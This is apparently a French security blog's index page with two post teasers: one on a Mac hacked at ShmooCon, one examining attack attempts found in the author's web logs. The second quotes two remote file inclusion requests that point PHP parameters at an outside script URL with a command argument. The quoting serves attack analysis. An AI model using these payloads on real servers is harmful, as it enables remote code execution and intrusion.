Logo

Ma petite parcelle d'Internet...

Un autre regard sur la sécurité informatique, entre autres futilités.

lundi 27 février 2006

Scary movie...

Scared

D

'après un article paru récemment (OK, c'était y'a un mois, mais je passe pas non plus ma vie sur SF) sur SecurityFocus, un spécialiste en sécurité informatique se serait fait r00ter son Powerbook sous Mac OS X pendant la ShmooCon, une conférence de sécurité informatique qui se déroulait mi janvier à Washington DC.

Lire la suite...

Note : 0.0/5 pour 0 vote

vendredi 10 février 2006

Tracking web abuse without honeypot

Super Timor

D

e temps en temps, je me ballade dans les logs de mon site web, et je dois avouer y trouver parfois des choses intéressantes. Parmi celles-ci, toutes les tentatives aveugles de compromission d'une hypothétique application web vulnérable. Par exemple, ces requêtes effectuées dernièrement :

dsl-xx-xx-xxxxx.ttnet.net.tr - - [08/Feb/2006:
   20:55:11 +0100] "GET /modules/Forums/admin/
   admin_styles.php?phpbb_root_path=
   http://ssalerno.free.fr/tool25.dat?
   &cmd=id HTTP/1.0" 404 235 "-" "Mozilla/4.0
   (compatible; MSIE 6.0b; Windows NT 5.0)"
dsl.staticxxxxxx.ttnet.net.tr - - [09/Feb/2006:
   04:17:02 +0100] "GET /modules/My_eGallery/
   public/displayCategory.php?basepath=
   http://ssalerno.free.fr/tool25.dat?
   &cmd=id HTTP/1.0" 404 244 "-" "Mozilla/4.0
   (compatible; MSIE 6.0b; Windows NT 5.0)"

Lire la suite...

Note : 3.0/5 pour 1 vote